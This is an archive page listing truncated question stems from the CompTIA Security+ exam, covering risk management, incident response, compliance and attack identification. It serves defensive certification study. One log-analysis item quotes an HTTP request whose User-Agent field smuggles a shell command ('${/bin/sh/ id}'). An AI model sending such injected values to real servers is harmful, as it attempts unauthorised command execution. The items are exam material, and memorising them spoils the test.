Exam Questions Archive
CompTIA Security+ Information Security Certification Exam
This page is for archival purposes and lists all of the exam's questions, with a link to each question along with its options and discussions.
Questions
1095 questions
- Cloud Security Architecture Lab: Configure a secure, redundant web application architecture using the provided cloud diagram. Select appropriate components for ...
- Network Security Investigation Lab: Investigate a potential network infection by analyzing host and firewall logs. Determine the source of infection and classif ...
- VPN Site-to-Site Configuration Lab Scenario: A systems administrator is configuring a site-to-site VPN between two branch offices to establish secure commun ...
- Scenario: There was a system breach due to poor password practices. Task: Analyze the access log and data dumps, then select the best passwor ...
- A recent black-box penetration test of http://example.com discovered that external website vulnerabilities exist, such as directory traversals, cross-site scrip ...
- You are a security operations analyst for a healthcare provider. Your main job function is to compare current, high-fidelity threat intelligence feeds to activi ...
- You are a security operations analyst for a banking institution. Your main job function is to compare current, high-fidelity threat intelligence feeds to activi ...
- Passwordless Command Question. Question: A security engineer is setting up passwordless authentication for the first time. Instructions: Use the minimum se ...
- Which of the following describes the difference between encryption and hashing?
- Which of the following analysis methods allows an organization to measure the exposure factor associated with organizational assets?
- Which of the following would be the most appropriate way to protect data in transit?
- Which of the following best explains a concern with OS-based vulnerabilities?
- Which of the following control types is AUP an example of?
- Which of the following most securely protects data at rest?
- Which of the following is the best way to validate the integrity and availability of a disaster recovery site?
- A company with a high-availability website is looking to harden its controls at any cost. The company wants to ensure that the site is secure by finding any pos ...
- A systems administrator notices that the research and development department is not using the company VPN when accessing various company-related services and sy ...
- A security analyst is monitoring logs from the organization's SIEM and identifies logs related to one of their salespeople: Time | IP address | Locatio ...
- Prior to implementing a design change, the change must go through multiple steps to ensure that it does not cause any security issues. Which of the following is ...
- An auditor notices that, before logging into the firewall, an employee opens a document in a shared folder that contains administrative credentials. Which of th ...
- An organization designs an inbound firewall with a fail-open configuration while implementing a website. Which of the following does the organization consider t ...
- A security administrator is reviewing the company’s infrastructure and decides to disable all unused ports on the firewall, uninstall unnecessary software from ...
- The security department is remediating vulnerabilities that were found during an audit of newly deployed systems. Which of the following must be done to ensure ...
- Which of the following should be used to ensure a device is inaccessible to a network-connected resource?
- A retail company receives a request to remove a customer’s data. Which of the following is the retail company considered under GDPR legislation?
- A company has yearly engagements with a service provider. The general terms and conditions are the same for all engagements. The company wants to simplify the p ...
- The security team must identify a strategy to automatically deprovision employees who leave the company. Which of the following actions will accomplish this tas ...
- Which of the following is an example of memory injection?
- A company processes and stores sensitive data on its own systems. Which of the following steps should the company take first to ensure compliance with privacy r ...
- Which of the following options will provide the lowest RTO and RPO for a database?
- Which of the following security controls are a company implementing by deploying HIPS (Select two).
- When trying to access an internal website, an employee reports that a prompt displays, stating that the site is insecure. Which of the following certificate typ ...
- A program manager wants to ensure contract employees can only access the company’s computers Monday through Friday from 9 a.m. to 5 p.m. Which of the following ...
- Which of the following is prevented by proper data sanitization?
- A forensic engineer determines that the root cause of a compromise is a SQL injection attack. Which of the following should the engineer review to identify the ...
- A software developer wishes to implement an application security technique that will provide assurance of the application's integrity. Which of the following te ...
- After a series of account compromises and credential misuse, a company hires a security manager to develop a security program. Which of the following steps shou ...
- Which of the following attacks primarily targets insecure networks?
- Which of the following describes effective change management procedures?
- Which of the following are the best methods for hardening end user devices? (Select two).
- A contractor is required to visually inspect the motherboards of all new servers that are purchased to determine whether the servers were tampered with. Which o ...
- The Chief Executive Officer has requested that a vendor conduct a penetration test without engaging the internal IT team to validate the company's investment in ...
- An organization found gaps in its software development environment and is implementing compensating controls to better protect its systems from external threats ...
- Which of the following is a qualitative approach to risk analysis?
- A CIRT team updates their playbooks to include instructions to respond to a ransomware attack. To prepare for a real event, the team performs a simulation and a ...
- A company is considering an expansion of access controls for an application that contractors and internal employees use to reduce costs. Which of the following ...
- An administrator implements web-filtering products but still sees that users are visiting malicious links. Which of the following configuration items does the s ...
- A company discovers suspicious transactions that were entered into the company's database and attached to a user account that was created as a trap for maliciou ...
- A company that has a large IT operation is looking to better control, standardize, and lower the time required to build new servers. Which of the following arch ...
- A recent review of logs indicates many attempts to join an internal wireless network from external devices. The connections appear to be originating from surroun ...
- Users see a certificate warning on their browsers when connecting to the server over HTTPS. Which of the following is the most likely cause?
- Which of the following would best allow a company to prevent access to systems from the internet?
- While browsing a web page, a user receives a pop-up with a link telling them to navigate to another site. To which of the following is the site vulnerable?
- Which of the following objectives is best achieved by a tabletop exercise?
- A software engineering manager wants to scan the code for security vulnerabilities before it is pushed into production. Which of the following types of analysis ...
- Which of the following encryption methods protects data if a user loses their laptop?
- A security architect wants to prevent employees from receiving malicious attachments by email. Which of the following functions should the chosen solution do?
- Which of the following principles requires that a company must keep files or records for a prescribed period of time before it disposes of those files or record ...
- For which of the following reasons would a systems administrator leverage a 3DES hash from an installer file that is posted on a vendor’s website?
- A security analyst wants to automate a task that shares data between programs. Which of the following is the best option for the analyst to use?
- Which of the following is an example of a data protection strategy that uses tokenization?
- Which of the following solutions provides a single, centralized source for reviewing events?
- A security administrator is addressing an issue with a legacy system that communicates data using an unencrypted protocol to transfer sensitive data to a third ...
- Which of the following is the best reason to complete an audit in a banking environment?
- Which of the following is the best way to prevent data from being leaked from a secure network that does not need to communicate externally?
- A user needs to complete training at https://comptiatraining.com. After manually entering the URL, the user sees that the accessed website is noticeably differe ...
- A Chief Information Security Officer is developing procedures to guide detective and corrective activities associated with common threats, including phishing, s ...
- Which of the following is the best reason to perform a tabletop exercise?
- A security team is in the process of hardening the network against externally crafted malicious packets. Which of the following is the most secure method to pro ...
- A company is experiencing a high number of users who are clicking on email-based attacks even though those users have completed annual training. The company's C ...
- Which of the following should a systems administrator do after performing remediation activities?
- A vendor salesperson is a personal friend of a company's Chief Financial Officer (CFO). The company recently made a large purchase from the vendor, which was di ...
- A company's accounting department receives an urgent payment message from the company's bank domain with instructions to wire transfer funds. The sender request ...
- During a penetration test in a hypervisor, the security engineer is able to use a script to inject a malicious payload and access the host filesystem. Which of ...
- Which of the following elements of digital forensics should a company use if it needs to ensure the integrity of evidence?
- A security analyst notices unusual behavior on the network. The IDS on the network was not able to detect the activities. Which of the following should the secu ...
- Which of the following is most likely a security concern when installing and using low-cost IoT devices in infrastructure environments?
- A company recently set up a system for employees to access their files remotely. However, the IT team has noticed that some employees are using personal devices ...
- A security analyst identifies an employee who added an unauthorized wireless router to an office branch. After an investigation, the router is removed, and the ...
- After a breach at a data processing center, an administrator receives a notification that administrative passwords were leaked online. Which of the following sh ...
- A security analyst wants to automate a task that shares data between programs. Which of the following is the best option for the analyst to use?
- A company wants to connect several hundred branch locations in a mesh model. All the users in each branch should be able to reach the data center as well as the ...
- A security analyst discovers multiple vulnerabilities and must mitigate them. The analyst must ensure protection against the following attacks: SQL injection ...
- Which of the following should be deployed on an externally facing web server in order to establish an encrypted connection?
- Which of the following mitigation techniques would a security analyst most likely use to avoid bloatware on devices?
- Which of the following is the best way to remove personal data from a social media account that is no longer being used?
- An administrator needs to ensure all emails sent and received by a specific address are stored in a non-alterable format. Which of the following best describes ...
- Which of the following activities identifies but does not exploit vulnerabilities?
- Which of the following should a systems administrator do after performing remediation activities?
- Which of the following is a possible consequence of a VM escape?
- A network engineer is increasing the overall security of network devices and needs to harden the devices. Which of the following will best accomplish this task?
- Which of the following is the most relevant reason a DPO would develop a data inventory?
- An organization is required to provide assurance that its controls are properly designed and operating effectively. Which of the following reports will best ach ...
- Which of the following would a service provider supply as an assurance for a disposal service as part of a disposal process?
- While updating the security awareness training, a security analyst wants to address issues created if vendors' email accounts are compromised. Which of the foll ...
- An attacker defaces a company’s website and refuses to relinquish control until the company removes specific harmful chemicals from its products. Which of the f ...
- While a school district is performing state testing, a security analyst notices all internet services are unavailable. The analyst discovers that ARP poisoning ...
- Which of the following threat vectors is most commonly utilized by insider threat actors attempting data exfiltration?
- A company discovers suspicious transactions that were entered into the company's database and attached to a user account that was created as a trap for maliciou ...
- Which of the following activities is used to determine the reason an incident occurred, prior to closing the incident?
- Which of the following is the act of proving to a customer that software developers are trained on secure coding?
- An organization keeps servers with confidential information in the same network as workstations. An attacker compromises a workstation and moves laterally to a ...
- A site reliability engineer is designing a recovery strategy that requires quick fail over to an identical site if the primary facility goes down. Which of the ...
- Which of the following definitions best describes the concept of log correlation?
- Which of the following steps should be taken before mitigating a vulnerability in a production server?
- A company purchased cyber insurance to address items listed on the risk register. Which of the following strategies does this represent?
- The Chief Information Officer (CIO) asked a vendor to provide documentation detailing the specific objectives within the compliance framework that the vendor’s ...
- Which of the following types of identification methods can be performed on a deployed application during runtime?
- A company recently set up a system for employees to access their files remotely. However, the IT team has noticed that some employees are using personal devices ...
- A security analyst notices unusual behavior on the network. The IDS on the network was not able to detect the activities. Which of the following should the secu ...
- A security architect wants to prevent employees from receiving malicious attachments by email. Which of the following functions should the chosen solution do?
- A security administrator is implementing encryption on all hard drives in an organization. Which of the following security concepts is the administrator applyin ...
- An organization is preparing to export proprietary software to a customer. Which of the following is the best way to prevent the loss of intellectual property?
- Which of the following techniques would attract the attention of a malicious attacker in an insider threat scenario?
- Which of the following is the greatest advantage that network segmentation provides?
- An accounting employee recently used software that was not approved by the company. Which of the following risks does this most likely represent?
- A security analyst learns that an attack vector, which was used as a part of a recent incident, was a well-known IoT device exploit. The analyst needs to review ...
- A new corporate policy requires all staff to use multifactor authentication to access company resources. Which of the following can be utilized to set up this f ...
- Which of the following tasks is typically included in the BIA process?
- An organization wants to increase an application's resiliency by configuring access to multiple servers in the organization's geographically dispersed environme ...
- Which of the following is an example of a data protection strategy that uses tokenization?
- To which of the following security categories does an EDR solution belong?
- Which of the following should be used to ensure an attacker is unable to read the contents of a mobile device’s drive if the device is lost?
- Company A jointly develops a product with Company B, which is located in a different country. Company A finds out that their intellectual property is being shar ...
- Which of the following provides resilience by hosting critical VMs within different IaaS providers while being maintained by internal application owners?
- Which of the following attacks exploits a potential vulnerability as a result of direct access to a system using weak cryptographic algorithms?
- Which of the following is a use of CVSS?
- Which of the following describes the difference between encryption and hashing?
- A company is concerned about theft of client data from decommissioned laptops. Which of the following is the most cost-effective method to decrease this risk?
- A company recently purchased a new building that does not have an existing wireless or wired infrastructure. A network engineer at the company needs to determin ...
- A retail store has recently been targeted by bad actors operating from a different continent. Which of the following would best limit unauthorized access to cre ...
- Which of the following is a qualitative approach to risk analysis?
- A security analyst notices an increase in port scans on the edge of the corporate network. Which of the following logs should the analyst check to obtain the at ...
- A penetration test reveals that users can easily access internal VLANs from the company's guest Wi-Fi. Which of the following security principles would remediat ...
- While a user reviews their email, a host gets infected by malware that came from an external hard drive plugged into the host. The malware steals all the user's ...
- A penetration tester was able to gain unauthorized access to a hypervisor platform. Which of the following vulnerabilities was most likely exploited?
- A Chief Information Security Officer wants to enhance security capabilities to block PII from being emailed or downloaded to unapproved external media. Which of ...
- Which of the following should a systems administrator use to decrease the company’s hardware attack surface?
- Which of the following is a directive managerial control?
- A security analyst is reviewing the following logs about a suspicious activity alert for a user's VPN log-ins: Which of the following malicious activity in ...
- A company’s leadership team wants to ensure employees only print business-related documents on company printers. Which of the following documents should the com ...
- A network administrator wants to ensure that network traffic is highly secure while in transit. Which of the following actions best describes the actions the ne ...
- Which of the following is the best way to prevent data from being leaked from a secure network that does not need to communicate externally?
- A company uses a cloud-based server for file storage and wants to ensure the security of its data in transit. Which of the following should the company use to s ...
- A new employee accessed an unauthorized website. An investigation found that the employee violated the company’s rules. Which of the following did the employee ...
- An engineer has ensured that the switches are using the latest OS, the servers have the latest patches, and the endpoints' definitions are up to date. Which of ...
- Which of the following provides the best protection against unwanted or insecure communications to and from a device?
- A security analyst is monitoring logs from the organization's SIEM and identifies logs related to one of their salespeople: Time | IP address | Locatio ...
- A penetration test identifies that an SMBv1 is enabled on multiple servers across an organization. The organization wants to remediate this vulnerability in the ...
- Which of the following should a company use to provide proof of external network security testing?
- A security analyst is evaluating a SaaS application that the human resources department would like to implement. The analyst requests a SOC 2 report from the Sa ...
- An administrator wants to automate an account permissions update for a large number of accounts. Which of the following would best accomplish this task?
- Which of the following is a type of vulnerability that involves inserting scripts into web-based applications in order to take control of the client’s web brows ...
- An organization wants to deploy software in a container environment to increase security. Which of the following would limit the organization’s ability to achie ...
- An organization wants to deploy software in a container environment to increase security. Which of the following would limit the organization’s ability to achie ...
- Which of the following aspects of the data management life cycle is most directly impacted by local and international regulations?
- Which of the following should be used to ensure an attacker is unable to read the contents of a mobile device's drive if the device is lost?
- A company recently purchased a new building that does not have an existing wireless or wired infrastructure. A network engineer at the company needs to determin ...
- Users report that certain processes from a batch job are not working correctly and various resources are unavailable. An application owner provides the source a ...
- An administrator must authenticate users to systems using credentials already authenticated by a business partner's LDAP system. Which of the following should t ...
- Which of the following would be the greatest concern for a company that is aware of the consequences of non-compliance with government regulations?
- Which of the following is the most likely reason a security analyst would review SIEM logs?
- A Chief Information Security Officer wants to enhance security capabilities to block PII from being emailed or downloaded to unapproved external media. Which of ...
- Company A jointly develops a product with Company B, which is located in a different country. Company A finds out that their intellectual property is being shar ...
- A company plans to secure its systems by: • Preventing users from sending sensitive data over corporate email • Restricting access to potentially harmful we ...
- Which of the following hardening techniques must be applied on a container image before deploying it to a production environment?
- A user sends an email that includes a digital signature for validation. Which of the following security concepts would ensure a user cannot deny they sent the e ...
- The board of a company needs to tell the leadership team which activities are too risky to undertake during business operations. Which of the following risk man ...
- Which of the following attacks uses a website to collectively target a group of developers within an organization?
- During a recent log review, an analyst discovers evidence of successful injection attacks. Which of the following will best address this issue?
- Which of the following is a preventive physical security control?
- An employee receives a work phone. Instead of starting up with the normal operating system, the phone loads to a gaming platform using administrative credential ...
- An organization's web servers host an online ordering system. The organization discovers that the servers are vulnerable to a malicious JavaScript injection, wh ...
- The security team is concerned about the amount of third-party SaaS applications requiring unique credentials that are not tied to a user's primary domain accou ...
- A penetration tester visits a client's website and downloads the site's content. Which of the following actions is the penetration tester performing?
- Which of the following actions must an organization take to comply with a person's request for the right to be forgotten?
- An administrator needs to perform server hardening before deployment. Which of the following steps should the administrator take?
- While conducting a business continuity tabletop exercise, the security team becomes concerned by potential impacts if a generator were to develop a fault duri ...
- Which of the following activities is used to determine the reason an incident occurred, prior to closing the incident?
- A security analyst is evaluating a SaaS application that the human resources department would like to implement. The analyst requests a SOC 2 report from the Sa ...
- While reviewing a recent compromise, a forensics team discovers there are hard-coded credentials in the database connection strings. Which of the following asse ...
- A security analyst is reviewing the security of a SaaS application that the company intends to purchase. Which of the following documentations should the securi ...
- An engineer needs to ensure that a script has not been modified before it is launched. Which of the following best provides this functionality?
- An MSSP manages firewalls for hundreds of clients. Which of the following tools would be most helpful to create a standard configuration template in order to im ...
- An organization wants to increase an application's resiliency by configuring access to multiple servers in the organization's geographically dispersed environme ...
- While a user reviews their email, a host gets infected by malware that came from an external hard drive plugged into the host. The malware steals all the user's ...
- A company purchased cyber insurance to address items listed on the risk register. Which of the following strategies does this represent?
- A company is required to use certified hardware when building networks. Which of the following best addresses the risks associated with procuring counterfeit ha ...
- Which of the following security concepts is accomplished with the installation of a RADIUS server?
- To which of the following security categories does an EDR solution belong?
- An analyst receives alerts for a CPU utilization spike on the servers that host a public website. The analyst determines that the servers are running outdated s ...
- Which of the following should a systems administrator use to decrease the company's hardware attack surface?
- An unexpected and out-of-character email message from a Chief Executive Officer's corporate account asked an employee to provide financial information and to ch ...
- Which of the following is the greatest advantage that network segmentation provides?
- Which of the following is the best physical security measure that prevents unauthorized vehicles from entering a data center while still allowing foot traffic?
- Which of the following threat vectors would a user be vulnerable to when using a smartphone to scan a two-dimensional matrix barcode?
- While a school district is performing state testing, a security analyst notices all internet services are unavailable. The analyst discovers that ARP poisoning ...
- A user receives an aggressive text from an unknown sender who is demanding money. Which of the following attacks is this an example of?
- Which of the following would best explain why a security analyst is running daily vulnerability scans on all corporate endpoints?
- The internal security team is investigating a suspicious attachment and wants to perform a behavior analysis in an isolated environment. Which of the following ...
- Which of the following can be used to mitigate attacks from high-risk regions?
- An administrator needs to ensure all emails sent and received by a specific address are stored in a non-alterable format. Which of the following best describes ...
- Which of the following would an organization most likely use to minimize the loss of data on a file server in the event data needs to be restored due to loss of ...
- Which of the following architecture models ensures that critical systems are physically isolated on the network to prevent access from users with remote access ...
- A company identified the potential for malicious insiders to harm the organization. Which of the following measures should the organization implement to reduce ...
- Which of the following is a directive managerial control?
- A penetration tester was able to gain unauthorized access to a hypervisor platform. Which of the following vulnerabilities was most likely exploited?
- A security analyst receives an alert from a front-end web server connected to a database back end. The alert contains the following logs: SELECT * FROM users ...
- Which of the following activities identifies but does not exploit vulnerabilities?
- Which of the following types of identification methods can be performed on a deployed application during runtime?
- A security analyst is investigating a suspicious file and wants to determine if it has been modified. Which of the following methods would be best for this purp ...
- A security engineer needs to quickly identify a signature from a known malicious file. Which of the following analysis methods would the security engineer most ...
- An organization that handles sensitive information wants to protect the information by using a reversible technology. Which of the following best satisfies this ...
- A group of developers has a shared backup account to access the source code repository. Which of the following is the best way to secure the backup account if there ...
- Which of the following aspects of the data management life cycle is most directly impacted by local and international regulations?
- Several employees download a productivity program that is useful but also leaks contact information and corporate organizational structure details. Which of the ...
- Which of the following does a user often agree to when logging in to a domain?
- Which of the following provides resilience by hosting critical VMs within different IaaS providers while being maintained by internal application owners?
- An organization purchased a critical business application containing sensitive data. The organization would like to ensure that the application is not exploited ...
- Which of the following steps should be taken before mitigating a vulnerability in a production server?
- A security engineer needs to patch an OS vulnerability that impacts all corporate laptops. Which of the following is necessary to ensure all corporate laptops a ...
- An organization wants to deploy software in a container environment to increase security. Which of the following would limit the organization's ability to achie ...
- A new corporate policy requires all staff to use multifactor authentication to access company resources. Which of the following can be utilized to set up this f ...
- Which of the following sites offers immediate service restoration following a disaster?
- Which of the following provides the best protection against unwanted or insecure communications to and from a device?
- A manager meets with various stakeholders involved with a recently resolved security incident. During the meeting, they discuss potential improvements to the en ...
- A risk committee determines that the SLE of a hardware failure is $10,000. The ARO is five. Which of the following describes the ALE?
- Which of the following architecture models ensures that critical systems are physically isolated on the network to prevent access from users with remote access ...
- Which of the following describes a situation where a user is authorized before being authenticated?
- A security analyst receives an alert from a front-end web server connected to a database back end. The alert contains the following logs: SELECT * FROM users ...
- A user sits in a coffee shop on a government-issued laptop. A stranger starts a conversation with the user and starts asking about where the user works, what di ...
- Which of the following should a security analyst use to prioritize the remediation of a vulnerability?
- A security analyst must prevent remote users from accessing malicious URLs. The sites need to be checked inline for reputation, content, or categorization. Whic ...
- A systems administrator needs to provide traveling employees with a security measure that will protect company devices regardless of where they are working. Whi ...
- A company wants to ensure that a mission-critical database should only be accessed from specific internal IP addresses. Which of the following should the compan ...
- A security engineer has been assigned to work on a request from outside counsel. The security engineer must provide all email correspondence within a specific d ...
- A security analyst regularly receives emails from users who are concerned that attached files may be malicious. Which of the following should the analyst use to ...
- An employee from the accounting department logs in to the website used for processing the company’s payments. After logging in, a new desktop application automa ...
- A Chief Security Officer signs off on a request to allow inbound SMB and RDP from the internet to a single VLAN. Which of the following is the most likely expla ...
- A network security administrator must allow internet access for a specific application virtualization software. Which of the following should the administrator ...
- A company hired a security manager from outside the organization to lead security operations. Which of the following actions should the security manager perform ...
- Which of the following is an advantage of a microservice-based architecture over traditional software architectures?
- Which of the following is an example of a certificate that is generated by an internal source?
- A company experiences a breach. The investigation reveals that the threat actor used a zero-day vulnerability to gain access and move laterally. Which of the fo ...
- Which of the following data protection strategies can be used to confirm file integrity?
- Which of the following digital forensics activities would a security team perform when responding to legal requests in a pending investigation?
- A security analyst needs to improve the company’s authentication policy following a password audit. Which of the following should be included in the policy?
- Which of the following is used to calculate the impact to an organization per cybersecurity incident?
- A company wants to track modifications to the code that is used to build new virtual servers. Which of the following will the company deploy?
- A forensic engineer determines that the root cause of a compromise is a SQL injection attack. Which of the following should the engineer review to identify the ...
- Which of the following agreements defines response time, escalation points, and performance metrics?
- A university uses two different cloud solutions for storing student data. Which of the following does this scenario represent?
- A security administrator is reviewing the company’s infrastructure and decides to disable all unused ports on the firewall, uninstall unnecessary software from ...
- A retail company receives a request to remove a customer’s data. Which of the following is the retail company considered under GDPR legislation?
- A penetration test identifies that SMBv1 is enabled on multiple servers across an organization. The organization wants to remediate this vulnerability in the ...
- While updating the security awareness training, a security analyst wants to address issues created if vendors' email accounts are compromised. Which of the foll ...
- Which of the following phases of the incident response process attempts to minimize disruption?
- Which of the following is a vulnerability concern for end-of-life hardware?
- An accounting employee recently used software that was not approved by the company. Which of the following risks does this most likely represent?
- An organization is required to provide assurance that its controls are properly designed and operating effectively. Which of the following reports will best ach ...
- Which of the following can be deployed in data centers as a protection against an undervoltage event?
- A business is expanding to a new country and must protect customers from accidental disclosure of specific national identity information. Which of the following ...
- A company is using a legacy FTP server to transfer financial data to a third party. The legacy system does not support SFTP, so a compensating control is needed ...
- A customer has a contract with a CSP and wants to identify which controls should be implemented in the IaaS enclave. Which of the following is most likely to co ...
- Which of the following should an organization use to ensure that it can review the controls and performance of a service provider or vendor?
- Which of the following should be used to aggregate log data in order to create alerts and detect anomalous activity?
- Which of the following solutions would most likely be used in the financial industry to mask sensitive data?
- An organization decides that most employees will work remotely. The existing VPN solution does not have adequate bandwidth, and the content filtering proxy is o ...
- Which of the following would help reduce alert fatigue?
- Which of the following would best ensure a controlled version release of a new software application?
- Which of the following makes IaC a preferred security architecture over traditional infrastructure models?
- Which of the following did the vendor provide to the CIO?
- Which of the following provides availability and mitigates the risk of a single point of failure in an application?
- Following a security incident involving a fully patched system, an IT administrator would like to mature the incident response process by ingesting more sources ...
- Which of the following is a reason to perform a one-time risk assessment?
- An analyst discovers a suspicious item in the SQL server logs. Which of the following could be evidence of an attempted SQL injection?
- The IT department is updating its policies regarding BYOD in the workplace after they discovered peer-to-peer torrent software. Which of the following would be ...
- Which of the following should be used to select a label for a file based on the file's value, sensitivity, or applicable regulations?
- Which of the following would help reduce the impact of a vulnerability in NAS installed on a large office network?
- In which of the following will unencrypted PLC management traffic most likely be found?
- Various company stakeholders meet to discuss roles and responsibilities in the event of a security breach that would affect offshore offices. Which of the follo ...
- A penetration test has demonstrated that domain administrator accounts were vulnerable to pass-the-hash attacks. Which of the following would have been the best ...
- Which of the following is a benefit of vendor diversity?
- After a security incident, a systems administrator asks the company to buy a NAC platform. Which of the following attack surfaces is the systems administrator t ...
- Which of the following documents details how to accomplish a technical security task?
- A security analyst is reviewing logs and discovers the following: 149.34.228.10 - - [28/Jan/2023:16:32:45 -0300] "GET / HTTP/1.0" User-Agent: ${/bin/sh/ id} 20 ...
- Employees sign an agreement that restricts specific activities when leaving the company. Violating the agreement can result in legal consequences. Which of the ...
- Which of the following could potentially be introduced at the time of side loading?
- A company's accounts payable clerk receives a message from a vendor asking to change their bank account before paying an invoice. The clerk makes the change and ...
- A systems administrator just purchased multiple network devices. Which of the following should the systems administrator perform to prevent attackers from acces ...
- Which of the following would best prepare a security team for a specific incident response scenario?
- Which of the following best describe the benefits of a microservices architecture when compared to a monolithic architecture?
- The physical security team at a company receives reports that employees are not displaying their badges. The team also observes employees tailgating at controll ...
- After creating a contract for IT contractors, the human resources department changed several clauses. The contract has gone through three revisions. Which of th ...
- Which of the following is the most likely to be used to document risks, responsible parties, and thresholds?
- According to various privacy rules and regulations, users have the power to request that all data pertaining to them is deleted. This is known as:
- Which of the following is a social engineering attack in which a bad actor impersonates a web URL?
- A business provides long-term cold storage services to banks that are required to follow regulator-imposed data retention guidelines. Banks that use these servi ...
- Which of the following is the best mitigation for a zero-day vulnerability found in mission-critical production servers that must be highly available?
- A database engineer needs sample customer data for testing purposes. Which of the following techniques can be used to remove sensitive information from database ...
- Which of the following activities should be performed first to compile a list of vulnerabilities in an environment?
- Which of the following can best contribute to prioritizing patch applications?
- The number of tickets the help desk has been receiving has increased recently due to numerous false-positive phishing reports. Which of the following would be b ...
- An analyst identifies that multiple users have the same passwords, but the hashes appear to be completely different. Which of the following most likely explains ...
- A security analyst created a fake account and saved the password in a non-readily accessible directory in a spreadsheet. An alert was also configured to noti ...
- Which of the following security concepts is accomplished when granting access after an individual has logged in to a computer network?
- A systems administrator creates a script that validates OS version, patch levels, and installed applications when users log in. Which of the following examples ...
- Which of the following is a type of vulnerability that may result from outdated algorithms or keys?
- A security administrator protects passwords by using hashing. Which of the following best describes what the administrator is doing?
- Which of the following methods to secure data is most often used to protect data in transit?
- A security team receives reports about high latency and complete network unavailability throughout most of the office building. Flow logs from the campus switch ...
- An administrator must replace an expired SSL certificate. Which of the following does the administrator need to create the new SSL certificate?
- Which of the following types of vulnerabilities involves attacking a system to access adjacent hosts?
- A company is concerned with supply chain compromise of new servers and wants to limit this risk. Which of the following should the company review first?
- Which of the following is the best safeguard to protect against an extended power failure?
- An organization needs to monitor its users' activities in order to prevent insider threats. Which of the following solutions would help the organization achieve ...
- Which of the following actions would reduce the number of false positives for an analyst to manually review?
- A security team installs an IPS on an organization’s network and needs to configure the system to detect and prevent specific network attacks. Which of the foll ...
- Which of the following data types relates to data sovereignty?
- An administrator has configured a quarantine subnet for all guest devices that connect to the network. Which of the following would be best for the security tea ...
- Which of the following describes the reason for using an MDM solution to prevent jailbreaking?
- A security analyst is prioritizing vulnerability scan results using a risk-based approach. Which of the following is the most efficient resource for the analyst ...
- A systems administrator wants to use a technical solution to explicitly define file permissions for the entire team. Which of the following should the administr ...
- A Chief Information Security Officer (CISO) has developed information security policies that relate to the software development methodology. Which of the follow ...
- Which of the following is a benefit of an RTO when conducting a business impact analysis?
- Which of the following threat actors would most likely deface the website of a high-profile music group?
- Which of the following should a company use to provide proof of external network security testing?
- Which of the following is the most important element when defining effective security governance?
- Which of the following is used to monitor suspicious traffic in real time between multiple systems within an organization?
- Which of the following prevents unauthorized modifications to internal processes, assets, and security controls?
- A company that operates with most of its infrastructure in the cloud had its development environment breached. The attackers gained access via a public-facing d ...
- Several users report receiving emails with a link that prompts them to enter and change their password. Some users have already entered their information. Which ...
- Which of the following is a benefit of launching a bug bounty program? (Select two).
- A company is experiencing loss of availability due to excessive traffic to their front-end web servers. The company hires a digital forensics expert to investig ...
- An administrator downloads a patch from outside of the official vendor's site and applies the patch to a recent critical operating system CVE. After deploying t ...
- An organization failed to account for the right-to-be-forgotten regulations. Which of the following impacts might this action have on the company?
- Which of the following data types best describes an AI tool developed by a company to automate the ticketing system under a specific contract?
- During an assessment, an organization provides a penetration tester with a website URL and login credentials. However, the tester does not have access to the so ...
- During a recent penetration test, the tester was able to plug a machine into an open wall jack, receive an IP address, and access internal resources and the int ...
- A Chief Information Security Officer (CISO) of an enterprise environment wants to ensure that users cannot navigate to known malicious domains. The CISO also wa ...
- After multiple phishing simulations, the Chief Security Officer announces a new program that incentivizes employees to not click phishing links in the upcoming ...
- Which of the following is the most likely benefit of conducting an internal audit?
- Which of the following can automate vulnerability management?
- An engineer needs to ensure that a script has not been modified before it is launched. Which of the following best provides this functionality?
- Which of the following control types describes an alert from a SIEM tool?
- A company executive connects to various networks, such as hotel guest Wi-Fi, while traveling. A security analyst needs to provide a solution that will allow the ...
- A company relies on open-source software libraries to build the software used by its customers. Which of the following vulnerability types would be the most dif ...
- Which of the following is the first step to secure a newly deployed server?
- Which of the following activities are associated with vulnerability management?
- A security manager wants to reduce the number of steps required to identify and contain basic threats. Which of the following will help achieve this goal?
- Which of the following best describes when a user installs an application from an unofficial application store?
- An organization is evaluating new regulatory requirements associated with the implementation of corrective controls on a group of interconnected financial syste ...
- A security report shows that during a two-week test period, 80% of employees unwittingly disclosed their SSO credentials when accessing an external website. The ...
- Which of the following would a service provider supply as an assurance for a disposal service as part of a disposal process?
- A remote employee navigates to a shopping website on their company-owned computer. The employee clicks a link that contains a malicious file. Which of the follo ...
- An organization has published a list of domains that end users are not authorized to visit on company devices in order to mitigate data loss or installation of ...
- Which of the following should an organization focus on the most when making decisions about vulnerability prioritization?
- A legal department must maintain a backup from all devices that have been shredded and recycled by a third party. Which of the following best describes this req ...
- Which of the following can be best used to discover a company’s publicly available breach information?
- An organization discovers that its cold site does not have enough storage and computers available. Which of the following was most likely the cause of this fail ...
- A company wants to add an MFA solution for all employees who access the corporate network remotely. Login requirements include something you know, are, and have ...
- Which of the following is used to improve security and overall functionality without losing critical application data?
- Which of the following is a prerequisite for a DLP solution?
- An accounting clerk sent money to an attacker’s bank account after receiving fraudulent instructions over the phone to use a new account. Which of the following ...
- Which of the following allows a systems administrator to tune permissions for a file?
- Which of the following best protects sensitive data in transit across a geographically dispersed infrastructure?
- Which of the following is the primary purpose of a service that tracks log-ins and time spent using the service?
- Which of the following is a risk for a company using end-of-life applications on its network?
- A database administrator must replicate the production environment for a new development project. The data owner wants to ensure that the production data will b ...
- Which of the following best describes the concept of information being stored outside of its country of origin while still being subject to the laws and require ...
- Which of the following security principles most likely requires validation before allowing traffic between systems?
- An alert references attacks associated with a zero-day exploit. An analyst places a bastion host in the network to reduce the risk of the exploit. Which of the ...
- A company evaluates several options that would allow employees to have remote access to the network. The security team wants to ensure the solution includes AAA ...
- A security analyst has determined that a security breach would have a financial impact of $15,000 and is expected to occur twice within a three-year period. Whi ...
- Which of the following phases of the incident response process attempts to minimize disruption?
- A government worker secretly copies classified files that contain defense tactics information to an external drive. The government worker then gives the externa ...
- Which of the following is most likely to be used as a just-in-time reference document within a security operations center?
- A company’s security team is reviewing its business continuity plan and must determine the amount of time needed for operations to resume after a disaster. Whic ...
- During a SQL update of a database, a temporary field used as part of the update sequence was modified by an attacker before the update completed in order to all ...
- The help desk receives multiple calls indicating that machines are running slowly when running enterprise applications. The help desk notes that the affected ma ...
- A company makes a change during the appropriate change window, but the unsuccessful change extends beyond the scheduled time and impacts customers. Which of the ...
- After an alert was triggered, a security analyst observed the following log: Event ID: 4728 A member was added to the security-enabled global group. Subject: ...
